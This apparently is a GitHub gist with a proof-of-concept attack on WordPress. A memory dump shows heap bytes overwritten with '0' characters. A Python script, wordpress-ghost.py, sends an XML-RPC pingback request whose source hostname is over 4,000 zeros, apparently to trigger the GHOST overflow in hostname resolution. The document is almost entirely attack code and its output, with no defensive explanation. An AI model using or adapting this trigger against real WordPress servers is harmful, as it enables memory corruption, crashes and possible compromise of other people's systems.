0x555556e0cb40: 0x3030303030303030 0x0000000030303030
0x555556e0cb50: 0x00007ffff751d778 0x00007ffff751d778
0x555556e0cb60: 0x0000000000000000 0x0000000000000000
0x555556e0cb70: 0x0000000000000000 0x0000000000000000
0x555556e0cb80: 0x0000000000000000 0x0000000000000000
0x555556e0cb90: 0x0000000000000000 0x0000000000000000
0x555556e0cba0: 0x0000000000000000 0x0000000000000000
0x555556e0cbb0: 0x0000000000000000 0x0000000000000000
0x555556e0cbc0: 0x0000000000000000 0x0000000000000000
0x555556e0cbd0: 0x0000000000000000 0x0000000000000000
0x555556e0cbe0: 0x0000000000000000 0x0000000000000000
0x555556e0cbf0: 0x0000000000000000 0x0000000000000000
0x555556e0cc00: 0x0000000000000000 0x0000000000000000
0x555556e0cc10: 0x0000000000000000 0x0000000000000000
0x555556e0cc20: 0x0000000000000000 0x0000000000000000
0x555556e0cc30: 0x0000000000000000 0x0000000000000000
0x555556e0cc40: 0x0000000000000000 0x0000000000000000
0x555556e0cc50: 0x0000000000000000 0x0000000000000000
0x555556e0cc60: 0x0000000000000000 0x0000000000000000
0x555556e0cc70: 0x0000000000000000 0x0000000000000000
0x555556e0cc80: 0x0000000000000000 0x0000000000000000
0x555556e0cc90: 0x0000000000000000 0x0000000000000000
0x555556e0cca0: 0x0000000000000000 0x0000000000000000
0x555556e0ccb0: 0x0000000000000000 0x0000000000000000
0x555556e0ccc0: 0x0000000000000000 0x0000000000000000
0x555556e0ccd0: 0x0000000000000000 0x0000000000000000
0x555556e0cce0: 0x0000000000000000 0x0000000000000000
0x555556e0ccf0: 0x0000000000000000 0x0000000000000000
0x555556e0cd00: 0x0000000000000000 0x0000000000000000
0x555556e0cd10: 0x0000000000000000 0x0000000000000000
0x555556e0cd20: 0x0000000000000000 0x0000000000000000
0x555556e0cd30: 0x0000000000000000 0x0000000000000000
0x555556e0cd40: 0x0000000000000000 0x0000000000000000
0x555556e0cd50: 0x0000000000000000 0x0000000000000000
0x555556e0cd60: 0x0000000000000000 0x0000000000000000
0x555556e0cd70: 0x0000000000000000 0x0000000000000000
0x555556e0cd80: 0x0000000000000000 0x0000000000000000
0x555556e0cd90: 0x0000000000000000 0x0000000000000000
0x555556e0cda0: 0x0000000000000000 0x0000000000000000
0x555556e0cdb0: 0x0000000000000000 0x0000000000000000
0x555556e0cdc0: 0x0000000000000000 0x0000000000000000
0x555556e0cdd0: 0x0000000000000000 0x0000000000000000
0x555556e0cde0: 0x0000000000000000 0x0000000000000000
0x555556e0cdf0: 0x0000000000000000 0x0000000000000000
0x555556e0ce00: 0x0000000000000000 0x0000000000000000
0x555556e0ce10: 0x0000000000000000 0x0000000000000000
0x555556e0ce20: 0x0000000000000000 0x0000000000000000
Raw
wordpress-ghost.py
import urllib2
pingback_url = 'http://192.168.56.6/wordpress/xmlrpc.php'
src_url = 'http://%s/' % ('0' * 0x1004)
dst_url = 'http://192.168.56.6/wordpress/?p=1'
data = """<?xml version="1.0"?>
<methodCall>
<methodName>pingback.ping</methodName>
<params>
<param>
<value><string>%s</string></value>
</param>
<param>
<value><string>%s</string></value>
</param>
</params>
</methodCall>
""" % (src_url, dst_url)
u = urllib2.urlopen(pingback_url, data)
print u.read()
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment